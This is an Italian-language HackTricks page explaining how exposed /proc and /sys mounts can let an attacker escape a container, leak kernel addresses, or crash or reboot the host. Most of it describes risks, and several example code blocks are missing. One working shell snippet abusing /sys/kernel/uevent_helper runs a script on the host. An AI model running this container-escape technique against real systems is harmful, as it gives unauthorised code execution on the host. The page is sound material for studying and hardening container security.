Sensitive Mounts
Last updated
Last updated
Impara e pratica l'hacking su AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica l'hacking su GCP: HackTricks Training GCP Red Team Expert (GRTE)
L'esposizione di /proc e /sys senza un'adeguata isolamento dei namespace introduce rischi significativi per la sicurezza, inclusa l'espansione della superficie di attacco e la divulgazione di informazioni. Queste directory contengono file sensibili che, se configurati in modo errato o accessibili da un utente non autorizzato, possono portare alla fuga del container, alla modifica dell'host o fornire informazioni che facilitano ulteriori attacchi. Ad esempio, il montaggio non corretto di -v /proc:/host/proc può eludere la protezione di AppArmor a causa della sua natura basata sul percorso, lasciando /host/proc non protetto.
Puoi trovare ulteriori dettagli su ciascuna potenziale vulnerabilità in https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts.
/proc/sysQuesta directory consente l'accesso per modificare le variabili del kernel, di solito tramite sysctl(2), e contiene diverse sottodirectory di interesse:
/proc/sys/kernel/core_patternDescritto in core(5).
Consente di definire un programma da eseguire alla generazione del file core con i primi 128 byte come argomenti. Ciò può portare all'esecuzione di codice se il file inizia con un pipe |.
Esempio di test ed exploit:
/proc/sys/kernel/modprobeDettagliato in proc(5).
Contiene il percorso al caricatore di moduli del kernel, invocato per il caricamento dei moduli del kernel.
Esempio di controllo dell'accesso:
/proc/sys/vm/panic_on_oomCitato in proc(5).
Un flag globale che controlla se il kernel va in panico o invoca l'OOM killer quando si verifica una condizione OOM.
/proc/sys/fsCome da proc(5), contiene opzioni e informazioni sul file system.
L'accesso in scrittura può consentire vari attacchi di negazione del servizio contro l'host.
/proc/sys/fs/binfmt_miscConsente di registrare interpreti per formati binari non nativi in base al loro numero magico.
Può portare a escalation dei privilegi o accesso a shell root se /proc/sys/fs/binfmt_misc/register è scrivibile.
Esploito e spiegato in modo dettagliato:
Tutorial approfondito: Link al video
/proc/proc/config.gzPotrebbe rivelare la configurazione del kernel se CONFIG_IKCONFIG_PROC è abilitato.
Utile per gli attaccanti per identificare vulnerabilità nel kernel in esecuzione.
/proc/sysrq-triggerConsente di invocare comandi Sysrq, potenzialmente causando riavvii immediati del sistema o altre azioni critiche.
Esempio di riavvio dell'host:
/proc/kmsgEspone i messaggi del buffer circolare del kernel.
Può aiutare negli exploit del kernel, nelle fughe di indirizzi e nel fornire informazioni sensibili sul sistema.
/proc/kallsymsElenca i simboli esportati dal kernel e i loro indirizzi.
Fondamentale per lo sviluppo di exploit del kernel, specialmente per superare KASLR.
Le informazioni sugli indirizzi sono limitate con kptr_restrict impostato su 1 o 2.
Dettagli in proc(5).
/proc/[pid]/memInterfaccia con il dispositivo di memoria del kernel /dev/mem.
Storicamente vulnerabile agli attacchi di escalation dei privilegi.
Maggiori dettagli in proc(5).
/proc/kcoreRappresenta la memoria fisica del sistema in formato core ELF.
La lettura può rivelare i contenuti della memoria dell'host e di altri container.
Le dimensioni del file possono causare problemi di lettura o crash del software.
Utilizzo dettagliato in Dumping /proc/kcore in 2019.
/proc/kmemInterfaccia alternativa per /dev/kmem, rappresentante la memoria virtuale del kernel.
Consente la lettura e la scrittura, quindi la modifica diretta della memoria del kernel.
/proc/memInterfaccia alternativa per /dev/mem, rappresentante la memoria fisica.
Consente la lettura e la scrittura, la modifica di tutta la memoria richiede la risoluzione degli indirizzi virtuali in fisici.
/proc/sched_debugRestituisce informazioni sulla pianificazione dei processi, aggirando le protezioni dello spazio dei PID.
Espone nomi dei processi, ID e identificatori cgroup.
/proc/[pid]/mountinfoFornisce informazioni sui punti di mount nel namespace di mount del processo.
Espone la posizione del rootfs o dell'immagine del container.
/sys/sys/kernel/uevent_helperUsato per gestire i uevent dei dispositivi del kernel.
Scrivere su /sys/kernel/uevent_helper può eseguire script arbitrari al verificarsi dei uevent.
Esempio di exploit: %%%bash
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
host_path=$(sed -n 's/.\perdir=([^,]).*/\1/p' /etc/mtab)
echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
echo change > /sys/class/mem/null/uevent
cat /output %%%
/sys/class/thermalControlla le impostazioni della temperatura, potenzialmente causando attacchi DoS o danni fisici.
/sys/kernel/vmcoreinfoRilascia gli indirizzi del kernel, compromettendo potenzialmente il KASLR.
/sys/kernel/securityContiene l'interfaccia securityfs, permettendo la configurazione dei Moduli di Sicurezza Linux come AppArmor.
L'accesso potrebbe consentire a un container di disabilitare il suo sistema MAC.
/sys/firmware/efi/vars e /sys/firmware/efi/efivarsEspone interfacce per interagire con le variabili EFI nella NVRAM.
Una cattiva configurazione o sfruttamento può portare a laptop bloccati o macchine host non avviabili.
/sys/kernel/debugdebugfs offre un'interfaccia di debug "senza regole" al kernel.
Storia di problemi di sicurezza dovuti alla sua natura non limitata.
Impara e pratica l'Hacking su AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica l'Hacking su GCP: HackTricks Training GCP Red Team Expert (GRTE)
